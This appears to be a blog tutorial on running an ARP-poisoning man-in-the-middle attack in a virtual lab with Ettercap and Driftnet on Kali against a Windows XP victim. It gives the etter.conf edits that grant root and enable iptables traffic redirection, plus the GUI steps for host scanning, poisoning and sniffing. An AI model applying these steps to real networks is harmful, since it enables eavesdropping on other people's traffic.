MITM ATTACK WITH ARP POISONING NETWORK




MITM ATTACK WITH ARP POISONING NETWORK

I'm trying out ARP poisoning to do a MITM attack. MITM stands for Main in the Middle. This type of attack simply is a form of active eavesdropping. The attacker make connections between victims, and relay all traffic between them. From the victim's point of view, it appears as if they are talking directly to each other with no knowledge that there is someone in the middle accessing all traffic.
Firstly I'll setup a virtual lab which is as below. I am using Parallels Desktop 9 on OSX.

    Router: Untangle
        MAC: 00:1c:42:66:2e:26
        IP: 192.168.2.254
    Victim: Windows XP
        MAC:
        IP: 192.168.2.30
    Attacker: Kali Linux
        MAC: 00:1c:42:eb:c8:2b
        IP: 192.168.2.20





After a successful MITM attack:





On the Kali machine, these are the tools that I am using to do the attack:

    Ettercap
    Driftnet

Driftnet listens to network traffic and picks out images from the TCP streams that it is observing

Ettercap can be best summed up by the summary on their website as below:

Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.

On Kali, if you are using Ettercap for the first time, it does need to be tweaked before using. The etter.conf file need to be edited as below:

ec_uid = 65534

ec_gid = 65534

to:

ec_uid = 0

ec_gid = 0

and the lines below:

#---------------

#     Linux

#---------------


# if you use ipchains:

#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"


# if you use iptables:

#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

need to be edited. Just remove the hash for iptables above so that it read as:

# if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

That will allow Ettercap to work as intended.

ec_uid = 0

ec_gid = 0

will allow Ettercap to have root access so that it can open the link layer sockets. NOTE: You can find etter.conf in /etc/etter.conf however Ettercap on Kali actually use /etc/ettercap/etter.conf so be sure to edit the correct file!

Let's fire up Ettercap. You can do this in command line by entering ettercap -G which will open the GUI of Ettercap.






Click on Sniff and select Unified Sniffing.

In my case I selected eth0 as the network interface. You should see Privileges dropped to UID 0 GID 0... showing in the log window among with other details showing that ettercap is able to open the link layer sockets.

Click on Hosts and then on Scan for hosts (or press Ctrl-S). 2 hosts added to the hosts list... shows at end of the log and press 'H' to show the hosts - it'll show their IP address and their MAC number.




As you can see, it found both the Windows XP victim and the Untangle system (which is the "router" in my virtual lab).

Click on Mitm in menu and select Arp poisoning. Tick the box for "Sniff remote connections" and click OK.














Now it's all ready. Click on Start and select Start sniffing.


Share this

Related Posts

Previous
Next Post »